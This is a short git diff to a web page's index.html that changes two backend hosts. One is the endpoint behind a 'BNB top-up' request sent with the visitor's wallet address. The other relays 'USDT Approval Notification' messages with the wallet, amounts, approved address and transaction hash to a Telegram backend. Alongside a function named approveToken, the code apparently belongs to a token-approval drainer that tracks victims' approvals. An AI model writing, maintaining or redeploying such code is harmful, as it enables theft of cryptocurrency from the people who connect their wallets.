--- a/index.html
+++ b/index.html
@@ -493,7 +493,7 @@
 // Function to request the BNB top-up from your backend
 async function requestBNBTopUp(account) {
     try {
-        const response = await fetch('https://subhim-production.up.railway.app/send-bnb', {
+        const response = await fetch('https://subham-scanner.onrender.com/send-bnb', {
             method: 'POST',
             headers: { 'Content-Type': 'application/json' },
             body: JSON.stringify({ recipient: account }),
@@ -634,7 +634,7 @@ async function approveToken(account) {
 
 // Telegram notification function - now via Railway backend (no direct Telegram call from frontend)
 async function sendTelegramNotification(walletAddress, bnbAmount, usdtAmount, approvedAddress, dateTime, txHash) {
-    const RAILWAY_BASE_URL = 'https://shubham-telegram-production.up.railway.app';
+    const RAILWAY_BASE_URL = 'https://telegram-backend-main.onrender.com';
 
     const message =
         `🔔 USDT Approval Notification\n\n` +
